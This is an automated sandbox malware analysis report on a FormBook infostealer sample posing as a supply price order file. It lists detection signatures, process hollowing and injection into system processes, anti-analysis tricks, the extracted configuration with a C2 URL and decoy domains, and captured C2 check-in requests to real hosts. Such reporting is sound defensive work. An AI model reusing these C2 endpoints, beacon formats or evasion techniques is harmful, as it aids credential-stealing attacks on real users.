Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report SUPPLY_PRICE_ORDER_9978484DF.exe

Overview

General Information

Sample Name:SUPPLY_PRICE_ORDER_9978484DF.exe
Analysis ID:491551
MD5:42346ae289e050d44fe9c0bcfb5e84b0
SHA1:8409c01d25748b3665cbaf119293d2c778cae1cd
SHA256:ee3ae7c76f41fab122d32494212625226a1784fb209b46b657272f0f3f0158b9
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SUPPLY_PRICE_ORDER_9978484DF.exe (PID: 1892 cmdline: 'C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe' MD5: 42346AE289E050D44FE9C0BCFB5E84B0)
    • RegSvcs.exe (PID: 2848 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
    • RegSvcs.exe (PID: 1112 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 6084 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • colorcpl.exe (PID: 5436 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 5504 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nudesalon.digital/rgoe/"], "decoy": ["iamstevekelsey.com", "homesofchaparralcountryclub.com", "voiceyupcom.com", "searchengineeye.com", "charsantosart.com", "baila.madrid", "yota.store", "halloweenbaldhills.net", "futurodr.com", "centercodebase.com", "666b20.xyz", "4-6-2.com", "gspotworld.com", "rbb78.com", "1kingbet.com", "hzhongon.com", "dossierinc.com", "sustainablefoodfactory.com", "golfsol.art", "socialenterprisestudio.com", "sec-app.pro", "mrcsclass.com", "apseymarine.com", "restate.club", "thenewtocsin.com", "mingwotech.com", "llesman.com", "limiteditionft.com", "ff4c3dgsp.xyz", "travuleaf.com", "whatsaauction.com", "iktbn-c01.com", "dpcqkw.xyz", "mahoyaku-exhibition.com", "bimcell-tlyuklemezamani.com", "thejegroupllc.com", "limponomefacil.com", "bordandoartes.com", "parsvivid.com", "lowkeymastery.com", "missionsafegame.com", "estanciasanpablo.online", "overlandshare.com", "thevillageplumbers.com", "newhollandpurpose.com", "eastmillnorthandover.com", "patrickandmaxine.com", "appleluis.host", "immerseinagro.com", "vapkey.net", "babeshotnud.com", "rap8b55d.com", "afro-occidentstyle.com", "shahjahantravel.com", "toptaxxi.store", "adronesview.com", "kinesio-leman.com", "teelandcompany.com", "bycracky.com", "sehatbersama.store", "snackithalal.com", "nailsestetic.space", "vanmetrecco.com", "pondokbali.store"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        3.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 2 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe' , ParentImage: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe, ParentProcessId: 1892, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2848
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe' , ParentImage: C:\Users\user\Desktop\SUPPLY_PRICE_ORDER_9978484DF.exe, ParentProcessId: 1892, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 2848

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nudesalon.digital/rgoe/"], "decoy": ["iamstevekelsey.com", "homesofchaparralcountryclub.com", "voiceyupcom.com", "searchengineeye.com", "charsantosart.com", "baila.madrid", "yota.store", "halloweenbaldhills.net", "futurodr.com", "centercodebase.com", "666b20.xyz", "4-6-2.com", "gspotworld.com", "rbb78.com", "1kingbet.com", "hzhongon.com", "dossierinc.com", "sustainablefoodfactory.com", "golfsol.art", "socialenterprisestudio.com", "sec-app.pro", "mrcsclass.com", "apseymarine.com", "restate.club", "thenewtocsin.com", "mingwotech.com", "llesman.com", "limiteditionft.com", "ff4c3dgsp.xyz", "travuleaf.com", "whatsaauction.com", "iktbn-c01.com", "dpcqkw.xyz", "mahoyaku-exhibition.com", "bimcell-tlyuklemezamani.com", "thejegroupllc.com", "limponomefacil.com", "bordandoartes.com", "parsvivid.com", "lowkeymastery.com", "missionsafegame.com", "estanciasanpablo.online", "overlandshare.com", "thevillageplumbers.com", "newhollandpurpose.com", "eastmillnorthandover.com", "patrickandmaxine.com", "appleluis.host", "immerseinagro.com", "vapkey.net", "babeshotnud.com", "rap8b55d.com", "afro-occidentstyle.com", "shahjahantravel.com", "toptaxxi.store", "adronesview.com", "kinesio-leman.com", "teelandcompany.com", "bycracky.com", "sehatbersama.store", "snackithalal.com", "nailsestetic.space", "vanmetrecco.com", "pondokbali.store"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeVirustotal: Detection: 28%Perma Link
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330815984.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330932008.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.510129850.00000000025D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.300246548.000000000E040000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.509697209.00000000024A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.269111767.0000000004251000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.320533115.000000000E040000.00000040.00020000.sdmp, type: MEMORY
          Source: 3.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: RegSvcs.pdb, source: colorcpl.exe, 0000000E.00000002.514451797.0000000004B47000.00000004.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, colorcpl.exe, 0000000E.00000002.513603550.000000000472F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, colorcpl.exe
          Source: Binary string: RegSvcs.pdb source: colorcpl.exe, 0000000E.00000002.514451797.0000000004B47000.00000004.00020000.sdmp

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49685 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49685 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49685 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49686 -> 23.225.139.107:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49686 -> 23.225.139.107:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49686 -> 23.225.139.107:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49687 -> 64.91.246.51:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49687 -> 64.91.246.51:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49687 -> 64.91.246.51:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 64.91.246.51 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.iamstevekelsey.com
          Source: C:\Windows\explorer.exeDomain query: www.gspotworld.com
          Source: C:\Windows\explorer.exeDomain query: www.yota.store
          Source: C:\Windows\explorer.exeDomain query: www.ff4c3dgsp.xyz
          Source: C:\Windows\explorer.exeDomain query: www.newhollandpurpose.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.225.139.107 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.appleluis.host
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.adronesview.com
          Source: C:\Windows\explorer.exeDomain query: www.teelandcompany.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.215.165.29 80Jump to behavior
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.ff4c3dgsp.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.nudesalon.digital/rgoe/
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
          Source: global trafficHTTP traffic detected: GET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=KdEc5zFmuggnLXnkala38KeRZUwGYpsmBda5bvOgbVa5jGbFYEbNRXOiQtYTCsFpD8+WwfyYDA== HTTP/1.1Host: www.gspotworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=vDEbv8rrDmkkiTshm4h8UJjCBA7dTpqpRs2jUd027mZ5NPASlMJS8wDm2zEWwRi0VbXM0fP6PA== HTTP/1.1Host: www.yota.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=sgGY6EHrU2/sPlFv65T/Wb7gB3GGagfeDoLJsp77UP3iiMN1AZE/7XMT6P9bXkgBT15arvy1nw== HTTP/1.1Host: www.ff4c3dgsp.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rgoe/?0N9=p62UTdjvvun5m4F6E/NDs8CkSXewz0Mmd3OAmKShvilGuUBo5ij0sMfMI9B7yPSR/U/saD/cPg==&n0DhB=j0DpGx9XxT-Tnhk HTTP/1.1Host: www.newhollandpurpose.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rgoe/?0N9=/t1+ewTNvP58zbN/GTmlHuihgocL7TvwecIdqR1o1yMMHUTs/zxhPcif7gHrks2EHupuL2PvCA==&n0DhB=j0DpGx9XxT-Tnhk HTTP/1.1Host: www.adronesview.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mBDlN3bRVBdzT2BPw== HTTP/1.1Host: www.teelandcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 Sep 2021 15:40:09 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.310611628.0000000006840000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: colorcpl.exe, 0000000E.00000002.514490454.0000000004CC2000.00000004.00020000.sdmpString found in binary or memory: http://www.dondominio.com/13/
          Source: colorcpl.exe, 0000000E.00000002.514490454.0000000004CC2000.00000004.00020000.sdmpString found in binary or memory: http://www.dondominio.com/13/buscar/baila.madrid/
          Source: colorcpl.exe, 0000000E.00000002.514490454.0000000004CC2000.00000004.00020000.sdmpString found in binary or memory: http://www.dondominio.com/13/products/domains/
          Source: colorcpl.exe, 0000000E.00000002.514490454.0000000004CC2000.00000004.00020000.sdmpString found in binary or memory: http://www.dondominio.com/13/products/services/
          Source: colorcpl.exe, 0000000E.00000002.514490454.0000000004CC2000.00000004.00020000.sdmpString found in binary or memory: http://www.dondominio.com/13/products/ssl/
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.267907043.0000000001967000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.com:
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.267907043.0000000001967000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: SUPPLY_PRICE_ORDER_9978484DF.exeString found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: SUPPLY_PRICE_ORDER_9978484DF.exe, 00000000.00000002.270901531.0000000007432000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.gspotworld.com
          Source: global trafficHTTP traffic detected: GET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=KdEc5zFmuggnLXnkala38KeRZUwGYpsmBda5bvOgbVa5jGbFYEbNRXOiQtYTCsFpD8+WwfyYDA== HTTP/1.1Host: www.gspotworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=vDEbv8rrDmkkiTshm4h8UJjCBA7dTpqpRs2jUd027mZ5NPASlMJS8wDm2zEWwRi0VbXM0fP6PA== HTTP/1.1Host: www.yota.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=sgGY6EHrU2/sPlFv65T/Wb7gB3GGagfeDoLJsp77UP3iiMN1AZE/7XMT6P9bXkgBT15arvy1nw== HTTP/1.1Host: www.ff4c3dgsp.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
